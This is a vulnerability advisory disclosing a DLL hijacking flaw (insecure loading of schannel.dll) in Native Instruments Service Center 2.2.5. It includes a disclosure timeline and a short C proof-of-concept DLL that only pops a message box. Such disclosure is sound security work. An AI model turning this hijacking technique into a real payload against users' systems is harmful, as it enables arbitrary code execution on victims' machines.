Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability

2010-11-20T00:00:00
ID ZSL-2010-4975
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-11-20T00:00:00

Description

Title: Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability
Advisory ID: ZSL-2010-4975
Type: Local/Remote
Impact: System Access
Risk: (5/5)
Release Date: 20.11.2010

Summary

The NI Service Center is a service used for Product Activation.

Description

The Service Center suffers from a DLL hijacking vulnerability, which could be exploited by remote attackers to compromise a vulnerable system. This issue is caused due to the application insecurely loading certain libraries ("schannel.dll") from the current working directory, which could allow attackers to execute arbitrary code by tricking a user into opening an activation return file (.naf) from a network share.

Vendor

Native Instruments GmbH - <http://www.native-instruments.com>

Affected Version

2.2.5 (R596)

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

[06.11.2010] Vulnerability discovered.
[09.11.2010] Contact with the vendor.
[09.11.2010] Vendor replies.
[09.11.2010] Explained to the vendor that we want to report a vulnerability.
[09.11.2010] Vendor answers in confusion.
[09.11.2010] Explained in details what this is all about.
[10.11.2010] Vendor informs the corresponding department and stated that if they're interested, they'll contact us.
[18.11.2010] Nobody gets in touch with us.
[19.11.2010] Informed the vendor that the public disclosure will occur on 20th of November.
[20.11.2010] Public advisory released.

PoC

scenter_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[2] <http://packetstormsecurity.org/files/96001>
[3] <http://www.securityfocus.com/bid/44989>
[4] <http://xforce.iss.net/xforce/xfdb/61321>

Changelog

[20.11.2010] - Initial release
[22.11.2010] - Added reference [1], [2] and [3]
[24.11.2010] - Added reference [4]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            /*

 Native Instruments Service Center 2.2.5 Insecure Library Loading Vulnerability


 Vendor: Native Instruments GmbH
 Product web page: http://www.native-instruments.com
 Affected version: 2.2.5 (R596)

 Summary: The NI Service Center is a service used for Product Activation.

 Desc: The Service Center suffers from a DLL hijacking vulnerability, which could be
 exploited by remote attackers to compromise a vulnerable system. This issue is
 caused due to the application insecurely loading certain libraries ("schannel.dll")
 from the current working directory, which could allow attackers to execute arbitrary
 code by tricking a user into opening an activation return file (.naf) from a network
 share.

 Tested on: Microsoft Windows XP Professional SP3 (English)

 Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk

 Advisory ID: ZSL-2010-4975
 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4975.php

 06.11.2010

*/


#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}